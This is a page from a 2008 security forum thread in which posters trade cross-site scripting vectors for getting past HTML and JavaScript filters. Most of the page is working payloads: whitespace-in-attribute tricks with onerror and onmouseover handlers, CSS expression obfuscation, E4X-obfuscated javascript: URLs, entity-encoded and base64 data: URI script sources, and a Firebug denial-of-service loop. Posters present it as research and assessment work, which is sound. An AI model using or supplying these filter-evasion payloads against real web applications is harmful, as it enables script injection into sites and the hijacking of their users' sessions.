Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...56789101112131415...LastNext
Current Page: 10 of 16
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 02, 2008 08:26AM

I don't like to brag, but I'm a fucking genius :P

http://wocares.com/xsstester.php?yxss=1&xss=%3Ca+href%3D+harmless%3D%22+onmouseover%3Dalert(1)%2F%2F%22%3Etest%3C%2Fa%3E&order_0=0&maxlen=0&order_1=10&s11=&s12=&order_2=20&r11=&r12=&order_3=30&order_4=40&order_5=50&order_6=60&order_7=70&order_8=80&order_9=90&order_10=100&order_11=110&order_12=120&order_13=130&order_14=140&s21=&s22=&order_15=150&s31=&s32=&order_16=160&s41=&s42=&order_17=170&r21=&r22=&order_18=180&r31=&r32=&order_19=190&enviroment=%5Bcont%5D&headers=

<a href= harmless=" onmouseover=alert(1)//">test</a>

edit: a little explanation
IE and FF seem to ignore spaces in front and after the = for good reasons (formatting)
now the thing is that to filters, it looks like href is empty, even though href contains 'harmless="'
to the filter it now looks like the rest of the tag is
harmless=" onmouseover=alert(1)//"
when it really is
onmouseover=alert(1)//"

edit2:

and here's an autoexecuting version of the vector:
http://wocares.com/xsstester.php?yxss=1&xss=%3Cimg+src%3D+alt%3D%22+onerror%3Dalert(1)%2F%2F%22%3E&order_0=0&maxlen=0&order_1=10&s11=&s12=&order_2=20&r11=&r12=&order_3=30&order_4=40&order_5=50&order_6=60&order_7=70&order_8=80&order_9=90&order_10=100&order_11=110&order_12=120&order_13=130&order_14=140&s21=&s22=&order_15=150&s31=&s32=&order_16=160&s41=&s42=&order_17=170&r21=&r22=&order_18=180&r31=&r32=&order_19=190&enviroment=%5Bcont%5D&headers=


<img src= alt=" onerror=alert(1)//">



Edited 4 time(s). Last edit at 08/02/2008 08:37AM by Kyo.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: thrill
Date: August 02, 2008 10:28AM

Quote

I don't like to brag, but I'm a fucking genius :P

Don't forget modest too! ;)

Nice find too.. who would have thunkit that a little space could create such havoc!

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: August 02, 2008 01:32PM

Haha, pretty neat.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 03, 2008 09:53AM

thanks, guys

here's one that can be used against sites which only filter out comments between style tags:

<style x="></style>">
body {
width: expres/**/sion(alert('XSS'));
}
</style>



Edited 2 time(s). Last edit at 08/03/2008 09:54AM by Kyo.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 03, 2008 04:02PM

E4X a thousand ways to hack Javascript:-
location=<text>javascr{new Array}ipt:aler{new Array}t(1)</text>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 03, 2008 07:07PM

it doesn't work for me

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: August 03, 2008 08:31PM

Does for me! Haha, that's insane Gareth! Awesome ^_^

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 04, 2008 04:33AM

@Kyo

FF only mate

@DoctorDan

Thanks :) I love hacking E4X :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 05, 2008 12:20AM

I use FF...

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 05, 2008 02:37AM

@kyo

Try this:-
<script>location=<text>javascr{new Array}ipt:aler{new Array}t(1)</text></script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: August 05, 2008 08:35AM

Is there any specific reasons why a lot of these only work in FF? Just curious, b/c a lot of these are great and I would love to be able to use them on assessments that I do internally for my employer.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 05, 2008 08:52AM

@matt

To my knowledge FF is the only browser that implements E4X within Javascript. I could be wrong. In future they may work with other browsers

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 06, 2008 12:48PM

HOLY SHIT
<script>alert(»XSS«)</script>













Okay, I'm just fucking with you guys. Anyway, check out the javascript on this baby: http://itscoming.wut.bz
I used quite a lot of the crossbrowsercompatible shit posted in this thread, but it's still a work in progress :)

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: August 06, 2008 06:40PM

Apparently mother JS found a new youngling to raise ;)

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Matt Presson
Date: August 07, 2008 09:08AM

Wow. that is some really screwed up code.

-----------------------------------------------------------------------
(ú=(&#952;='',[µ=!(&#934;=!&#952;+{})+&#952;,&#920;=&#934;[ø=+!&#952;]+&#934;[+&#952;],&#297;=µ[ø],Ø=µ[º=ø+++ø],Ç=&#934;[º+ø],à=ú[&#934;[º+º]+&#934;[+&#952;]+Ç+&#297;]][Ø+Ç+&#920;])())[&#297;+à('&#149;êí')](Ç+à('Á«)'))

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: yawnmoth
Date: August 07, 2008 10:43AM

It seems to me like some of these vectors really ought to be mentioned in the XSS cheat sheet. Is that just not being maintained, anymore, or is there some other reason that these aren't being added to it?

Maybe someone else should take it on?

Kyo Wrote:
-------------------------------------------------------
> I don't like to brag, but I'm a fucking genius :P
>
> http://wocares.com/xsstester.php?yxss=1&xss=%3Ca+h
> ref%3D+harmless%3D%22+onmouseover%3Dalert(1)%2F%2F
> %22%3Etest%3C%2Fa%3E&order_0=0&maxlen=0&order_1=10
> &s11=&s12=&order_2=20&r11=&r12=&order_3=30&order_4
> =40&order_5=50&order_6=60&order_7=70&order_8=80&or
> der_9=90&order_10=100&order_11=110&order_12=120&or
> der_13=130&order_14=140&s21=&s22=&order_15=150&s31
> =&s32=&order_16=160&s41=&s42=&order_17=170&r21=&r2
> 2=&order_18=180&r31=&r32=&order_19=190&enviroment=
> %5Bcont%5D&headers=
>
> test
>
> edit: a little explanation
> IE and FF seem to ignore spaces in front and after
> the = for good reasons (formatting)
> now the thing is that to filters, it looks like
> href is empty, even though href contains
> 'harmless="'
> to the filter it now looks like the rest of the
> tag is
> harmless=" onmouseover=alert(1)//"
> when it really is
> onmouseover=alert(1)//"
>
> edit2:
>
> and here's an autoexecuting version of the
> vector:
> http://wocares.com/xsstester.php?yxss=1&xss=%3Cimg
> +src%3D+alt%3D%22+onerror%3Dalert(1)%2F%2F%22%3E&o
> rder_0=0&maxlen=0&order_1=10&s11=&s12=&order_2=20&
> r11=&r12=&order_3=30&order_4=40&order_5=50&order_6
> =60&order_7=70&order_8=80&order_9=90&order_10=100&
> order_11=110&order_12=120&order_13=130&order_14=14
> 0&s21=&s22=&order_15=150&s31=&s32=&order_16=160&s4
> 1=&s42=&order_17=170&r21=&r22=&order_18=180&r31=&r
> 32=&order_19=190&enviroment=%5Bcont%5D&headers=
>
>
>

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: thornmaker
Date: August 07, 2008 01:09PM

yawnmoth Wrote:
-------------------------------------------------------
> It seems to me like some of these vectors really
> ought to be mentioned in the XSS cheat sheet. Is
> that just not being maintained, anymore, or is
> there some other reason that these aren't being
> added to it?
>

The XSS cheat sheet is more about how to get to the point where you can inject JavaScript (et al.) to a vulnerable page in the first place. This thread is more about what can be done with JavaScript after that point (in order to avoid detection and filters, that is... not how to bake up a cookie logger or whatever...)

Edit: That being said, there is obviously some overlap between these two



Edited 1 time(s). Last edit at 08/07/2008 01:11PM by thornmaker.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 07, 2008 03:13PM

well he was quoting my post, which means he's probably talking about the vector I came up with

I actually mailed that to RSnake requesting it to be added, no response so far. Oh well, I'll be patient.

edit:

oh yeah, I'd also be glad to make and maintain a cheat sheet, if RSnake wouldn't mind me taking all the content of his cheat sheet.

edit:

I sent him an email asking what he thinks



Edited 2 time(s). Last edit at 08/07/2008 03:24PM by Kyo.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 07, 2008 03:34PM

Is there any need for cheatsheets?

Isn't the fun finding them for yourself

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 07, 2008 03:41PM

there is, if you're writing webapps

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 08, 2008 02:36AM

two more vectors based on the one I posted on the top of this page:
1)
<img src= alt=" hello=">" onerror=alert(1)>

basically, making the whitelist believe the tag has ended when it's still going
the reality is:
<img
src= alt="
hello=">"
onerror=alert(1)
>

the whitelist thinks:
<img
src=
alt=" hello="
>

and 2), more making the whitelist believe the tag ended in an enviroment that allows harmless javascript, but filters out the good stuff

<script hello= harmless=" ok=">//" src="MALICIOUSJAVASCRIPT">
harmless javascript that is allowed
</script>

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 08, 2008 03:04AM

Not forgetting:-
<script/src=data:text/javascript,alert(1)></script>

and on IE:
<script/onreadystatechange=alert(1)>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 08, 2008 03:09AM

mhm, onreadystatechange, I haven't heard of that one before

nice!
Couldn't you also obfuscate the word javascript with encoding, though?


also, here I tried to wrap as much shit around the actual function as possible:
a:;{;1*(1/(this.window.top[(('')+("alert")+(''))])(/1/.source)+1)-1;};


edit:
yup, here's a more fun version of yours:
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>



Edited 1 time(s). Last edit at 08/08/2008 03:11AM by Kyo.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 08, 2008 09:51AM

location=XML(<x>java{[]}script:ale{[]}rt(/I am a e4x haxor/)</x>).*::*

Function(<text>\u0061{new String}lert(1)</text>)()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 08/08/2008 09:59AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 11, 2008 09:03AM

new Function(<text><x y="a"></x><x y="lert"></x><x y="(1)"></x></text>..@y)()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: C1c4Tr1Z
Date: August 11, 2008 06:48PM

Here's one, it's very simple but i didn't read it in the thread:

<iframe/src=data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==>

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: August 12, 2008 02:02PM

clever

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: DoctorDan
Date: August 12, 2008 03:04PM

Gareth's are making me happy. Crazy concatenation in that last one. I've never thought of onreadystatechange outside the context of XHR requests, but after looking on the MSDN I see it does somewhat make sense. I haven't tested it out, but it seems as though onreadystatechange will also work on a few other interesting tags, as listed here (in the Applies To section): http://msdn.microsoft.com/en-us/library/ms534359.aspx

I bet that event is not commonly filtered as an attribute.

-Dan

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: August 13, 2008 10:25AM

eval(dispatchEvent[-5][4]+enableExternalCapture[-5][4]+dispatchEvent[-5][10]+enableExternalCapture[-5][10]+dispatchEvent[-5][5]+/(1)/[-1])

AND

eval(<x>{dispatchEvent[-5][4]}{enableExternalCapture[-5][4]}{dispatchEvent[-5][10]}{enableExternalCapture[-5][10]}{dispatchEvent[-5][5]}</x>..*+/(1)/[-1])

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 08/13/2008 11:46AM by Gareth Heyes.

Options: ReplyQuote
Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: August 14, 2008 06:19PM

Some Firebug fun (DoS)

for(_=console.dir;_==_;_(_))_(_)

Options: ReplyQuote
Pages: PreviousFirst...56789101112131415...LastNext
Current Page: 10 of 16


Sorry, you can't reply to this topic. It has been closed.